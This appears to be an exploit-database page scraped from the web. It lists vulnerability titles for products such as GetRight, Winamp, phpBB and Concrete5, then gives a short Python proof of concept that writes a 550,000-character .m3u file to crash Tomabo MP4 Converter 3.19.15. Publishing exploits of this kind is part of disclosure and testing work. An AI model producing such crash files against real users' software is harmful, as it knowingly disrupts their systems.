
3 new exploits GetRight 5.2a - Skin File (.grs) Buffer Overflow GetRight 5.2a - '.grs' Skin File Buffer Overflow Tomabo MP4 Converter 3.19.15 - Denial of Service Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation Winamp 5.04 - Skin File (.wsz) Remote Code Execution Winamp 5.04 - '.wsz' Skin File Remote Code Execution PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled) PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit Concrete5 < 5.4.2.1 - Multiple Vulnerabilities Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting Concrete5 8.1.0 - 'Host' Header Injection Concrete5 CMS 8.1.0 - 'Host' Header Injection DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass
20 lines
No EOL
466 B
Python
Executable file
20 lines
No EOL
466 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: Tomabo MP4 Converter DOS
|
|
# Date: 13/08/17
|
|
# Exploit Author: Andy Bowden
|
|
# Vendor Homepage: http://www.tomabo.com/
|
|
# Software Link: http://www.tomabo.com/mp4-converter/index.html
|
|
# Version: 3.19.15
|
|
# Tested on: Windows 7 x86
|
|
# CVE : None
|
|
|
|
#Generate a .m3u file using the python script and import it into the MP4 Converter.
|
|
|
|
file = "crash.m3u"
|
|
|
|
buffer = "A" * 550000
|
|
|
|
f = open(file, "w")
|
|
f.write(buffer)
|
|
f.close() |